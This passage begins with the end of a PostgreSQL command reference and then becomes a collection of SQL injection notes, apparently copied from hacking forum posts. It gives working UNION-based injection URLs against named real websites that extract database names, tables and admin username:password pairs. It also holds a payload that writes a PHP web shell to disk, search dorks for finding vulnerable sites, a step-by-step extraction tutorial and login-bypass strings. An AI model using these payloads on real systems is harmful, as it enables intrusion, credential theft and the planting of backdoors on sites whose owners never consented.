847EXPLAIN -- show the execution plan of a statement
848FETCH -- retrieve rows from a table using a cursor
849GRANT -- define access privileges
850INSERT -- create new rows in a table
851LISTEN -- listen for a notification
852LOAD -- load or reload a shared library file
853LOCK -- explicitly lock a table
854MOVE -- position a cursor on a specified row of a table
855NOTIFY -- generate a notification
856PREPARE -- create a prepared query
857REINDEX -- rebuild corrupted indexes
858RESET -- restore the value of a run-time parameter to a default value
859REVOKE -- remove access privileges
860ROLLBACK -- abort the current transaction
861SELECT -- retrieve rows from a table or view
862SELECT INTO -- create a new table from the results of a query
863SET -- change a run-time parameter
864SET CONSTRAINTS -- set the constraint mode of the current transaction
865SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
866SET TRANSACTION -- set the characteristics of the current transaction
867SHOW -- show the value of a run-time parameter
868START TRANSACTION -- start a transaction block
869TRUNCATE -- empty a table
870UNLISTEN -- stop listening for a notification
871UPDATE -- update rows of a table
872VACUUM -- garbage-collect and optionally analyze a database
873
874
875
876
877http://www.wallistile.com/featured.php?id=-548 union select 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,1 ?3,14,15,16,17,18,19,20--
878
879
880.php?id=-1+union+select+1,2,3,4,5,'<?php @system($_REQUEST["cmd"]); ?>',6,7,8+INTO+DUMPFILE+'/home/username/public_html/images/shell.php'
881
882http://www.pixheaven.net/galerie_us.php?id=-3 union select 1,1,1,1,1,1,substring(@@version,1,1)=5,1,1-- f
883
884********************************************
885inurl:"php?id=" & intitle:"fucked"
886article_full.php?id=
887media.php?id=14358
888exp.php?ID=659
889view_video.php?id=19844
890
891Example of typical dork: inurl:"product.php?product_id="
892Example of a dork I would use: inurl:"view/products.php?ProdID=" & ".co.uk" & intext:"basket"
893
894inurl:"option=com_mytube"
895
896***************************
897
898union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x(hex value of "admin" here)--
899
900This will display the columns contained in table "admin".
901
902EDIT: sorry hac already answered ^_^. @op yes that is correct.
903
904
905try this
906
907Code:
908http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=0x703235336a376d6c5f6e687061--
909
910703235336a376d6c5f6e687061 = p253j7ml_nhpa in hex. p253j7ml_nhpa is a database in the site. I used this to get the database names.
911
912Code:
913http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
914
915
916Using database() gives you the "active" table, where as with using the query above you can see all the databases on the site, and specify which one you want to get the tables from.
917
918next, you'd get the columns like so
919
920Code:
921http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e--
922
92361646d696e = admin in hex.
924
925then finally, we get the username and password info, so we do
926
927Code:
928http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(username,0x3a,password),3,4 from admin--
929
9303a is a colon in hex. So its like username:password but you have to tell it in hex and you always need a 0x before any hex.
931
932NOTE: If you're getting tables from a different database thats not the active one (turns out this is the active database) you need to put the database in that query above too like this
933
934Code:
935http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(username,0x3a,password),3,4 from p253j7ml_nhpa.admin--
936
937(btw null is the same as -4 the - just nulls the number is it can be id=0, or id=null, or id=-99 they are all null)
938
939
940
941**************************************************
942
943http://www.lifeskillstraining.com:2082
944
945
946*****************************************************************
947
948
949So once you have you'r site
950http://www.xxxx.com/index.php?catid=1
951now we add a ' to the end of the url
952so the site is
953http://www.xxxx.com/index.php?catid=1'
954if there is an error of some sort then it is vulnerable
955now we need to find the number of columns in the sql database
956so we type
957http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
958http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
959http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
960http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
961http://www.xxxx.com/index.php?catid=1 order by 5-- "error"
962
963so this database has 4 columns because we got an error on 5
964on some databases there is 2 columns and on some 200 it varies
965so once we have the column number.
966we try the union function
967http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
968if you see some numbers like 1 2 3 4 on the screen or the column names
969it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
970so now we need to info about the db
971so lets say the numbers 2 and 4 showed up on the screen
972so i will use my query on 2
973http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
974the db type and version will pop up on the screen
975if the db version is 4 or lower then to extract the password you will need these queries
976http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
977this should display the table containing the admin username and password
978but if not then you will have to guess the table
979so once you have your table "or not"
980then type
981http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
982where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
983then once u have the right table name you should get the administrator password
984then just do the same thing but type username instead of password
985sometimes the password is hashed and you need to crack it.
986then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
987now if the database is version 5 or up
988type
989http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
990and that will display a list of all the tables
991once you have your table name
992type the same thing as 4
993http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
994then the same with username
995but now if it doesnt work far all those things
996just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
997just play around with those
998but sometimes we also need to use the version() or version@@
999so sometimes UNION SELECT version (),password,3,4 FROM admintable--
1000or UNION SELECT version @@,password,3,4 FROM admintable--
1001
1002
1003&************************************************
1004
1005TO get all DBs use :-
1006http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--
1007
1008then convert DB name u want to get into to hex and add 0x before the hex
1009
1010then use
1011
1012the current query
1013http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=replace me with hex--
1014
1015
1016
1017*****************************************
1018
1019
1020Try these steps:
1021
1022 * To gain access and find a user name.
1023 'OR''='
1024
1025 SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''
1026
1027 Enter the string as both user name and password in the frame on the right. This should get you logged in as a user (jake happens to be the first user in the table). This tells you that Jake is a user and it allows you to access his account - but it does not tell you his password.
1028 * Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the following string as the password:
1029 Does jake's password have a w in it?
1030 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
1031Does jake's password start with w?
1032 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='
1033Does jake's password have an w followed by d?
1034 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
1035Is the fourth letter of jake's password w?
1036 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
1037
1038
1039 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
1040
1041 Are there more than 10 rows in the password table?
1042 ' OR (SELECT COUNT(*) FROM users)>10 AND ''='
1043Is there a user with an r in his name?
1044 ' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1045Is there a user (other than jake) with an a in his name?
1046 ' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='